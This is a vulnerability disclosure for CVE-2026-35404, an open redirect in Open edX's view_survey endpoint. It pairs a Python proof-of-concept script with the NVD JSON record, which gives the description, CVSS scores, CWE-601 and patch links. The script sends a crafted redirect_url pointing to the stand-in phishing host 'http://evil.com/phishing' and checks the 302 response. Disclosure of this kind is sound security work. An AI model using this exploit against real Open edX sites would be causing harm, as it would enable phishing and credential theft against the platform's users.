CVE-2026-35404

# PoC for CVE-2026-35404: Open edX Platform Open Redirect import requests def exploit_open_redirect(target_host, redirect_url): """ Exploits the open redirect vulnerability in the view_survey endpoint. """ # Construct the malicious URL endpoint = f"{target_host}/survey/view_survey" params = { "name": "non_existent_survey", # Triggers the 302 redirect logic "redirect_url": redirect_url } print(f"[*] Sending request to: {endpoint}") print(f"[*] Payload: redirect_url={redirect_url}") try: # Send request without following redirects to capture the Location header response = requests.get(endpoint, params=params, allow_redirects=False, timeout=10) if response.status_code == 302: location = response.headers.get('Location') if location == redirect_url: print(f"[+] Vulnerability Confirmed! Server redirects to: {location}") return True else: print(f"[-] Unexpected redirect to: {location}") else: print(f"[-] Expected 302 Redirect, got status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": # Example usage target = "http://localhost:8000" malicious_site = "http://evil.com/phishing" exploit_open_redirect(target, malicious_site)

{"cve": {"id": "CVE-2026-35404", "sourceIdentifier": "[email protected]", "published": "2026-04-06T22:16:21.360", "lastModified": "2026-05-11T18:16:32.343", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open edX Platform enables the authoring and delivery of online learning at any scale. The view_survey endpoint accepts a redirect_url GET parameter that is passed directly to HttpResponseRedirect() without any URL validation. When a non-existent survey name is provided, the server issues an immediate HTTP 302 redirect to the attacker-controlled URL. Additionally, the same unvalidated URL is embedded in a hidden form field and returned in a JSON response after form submission, where client-side JavaScript performs location.href = url. This enables phishing and credential theft attacks against authenticated Open edX users. This vulnerability is fixed with commit 76462f1e5fa9b37d2621ad7ad19514b403908970."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openedx:openedx:*:*:*:*:*:*:*:*", "versionEndIncluding": "2026-04-02", "matchCriteriaId": "06A17A40-548D-40D0-BD7F-CC30B7EA25DA"}]}]}], "references": [{"url": "https://github.com/openedx/openedx-platform/commit/76462f1e5fa9b37d2621ad7ad19514b403908970", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openedx/openedx-platform/security/advisories/GHSA-2843-x998-f8r2", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}